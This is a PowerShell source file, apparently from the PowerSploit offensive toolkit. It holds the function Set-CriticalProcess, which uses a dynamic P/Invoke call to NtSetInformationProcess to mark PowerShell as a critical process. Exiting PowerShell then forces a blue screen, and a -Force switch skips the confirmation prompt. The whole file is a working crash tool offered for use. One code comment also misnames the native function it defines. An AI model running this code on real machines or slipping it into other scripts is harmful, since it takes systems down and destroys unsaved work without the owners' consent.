99 lines
3.0 KiB
PowerShell
99 lines
3.0 KiB
PowerShell
function Set-CriticalProcess
|
|
{
|
|
<#
|
|
.SYNOPSIS
|
|
|
|
Causes your machine to blue screen upon exiting PowerShell.
|
|
|
|
PowerSploit Function: Set-CriticalProcess
|
|
Author: Matthew Graeber (@mattifestation)
|
|
License: BSD 3-Clause
|
|
Required Dependencies: None
|
|
Optional Dependencies: None
|
|
|
|
.PARAMETER ExitImmediately
|
|
|
|
Immediately exit PowerShell after successfully marking the process as critical.
|
|
|
|
.PARAMETER Force
|
|
|
|
Set the running PowerShell process as critical without asking for confirmation.
|
|
|
|
.EXAMPLE
|
|
|
|
Set-CriticalProcess
|
|
|
|
.EXAMPLE
|
|
|
|
Set-CriticalProcess -ExitImmediately
|
|
|
|
.EXAMPLE
|
|
|
|
Set-CriticalProcess -Force -Verbose
|
|
|
|
#>
|
|
|
|
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param (
|
|
[Switch]
|
|
$Force,
|
|
|
|
[Switch]
|
|
$ExitImmediately
|
|
)
|
|
|
|
if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))
|
|
{
|
|
throw 'You must run Set-CriticalProcess from an elevated PowerShell prompt.'
|
|
}
|
|
|
|
$Response = $True
|
|
|
|
if (!$Force)
|
|
{
|
|
$Response = $psCmdlet.ShouldContinue('Have you saved all your work?', 'The machine will blue screen when you exit PowerShell.')
|
|
}
|
|
|
|
if (!$Response)
|
|
{
|
|
return
|
|
}
|
|
|
|
$DynAssembly = New-Object System.Reflection.AssemblyName('BlueScreen')
|
|
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
|
|
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BlueScreen', $False)
|
|
|
|
# Define [ntdll]::NtQuerySystemInformation method
|
|
$TypeBuilder = $ModuleBuilder.DefineType('BlueScreen.Win32.ntdll', 'Public, Class')
|
|
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('NtSetInformationProcess',
|
|
'ntdll.dll',
|
|
([Reflection.MethodAttributes] 'Public, Static'),
|
|
[Reflection.CallingConventions]::Standard,
|
|
[Int32],
|
|
[Type[]] @([IntPtr], [UInt32], [IntPtr].MakeByRefType(), [UInt32]),
|
|
[Runtime.InteropServices.CallingConvention]::Winapi,
|
|
[Runtime.InteropServices.CharSet]::Auto)
|
|
|
|
$ntdll = $TypeBuilder.CreateType()
|
|
|
|
$ProcHandle = [Diagnostics.Process]::GetCurrentProcess().Handle
|
|
$ReturnPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(4)
|
|
|
|
$ProcessBreakOnTermination = 29
|
|
$SizeUInt32 = 4
|
|
|
|
try
|
|
{
|
|
$null = $ntdll::NtSetInformationProcess($ProcHandle, $ProcessBreakOnTermination, [Ref] $ReturnPtr, $SizeUInt32)
|
|
}
|
|
catch
|
|
{
|
|
return
|
|
}
|
|
|
|
Write-Verbose 'PowerShell is now marked as a critical process and will blue screen the machine upon exiting the process.'
|
|
|
|
if ($ExitImmediately)
|
|
{
|
|
Stop-Process -Id $PID
|
|
}
|
|
} |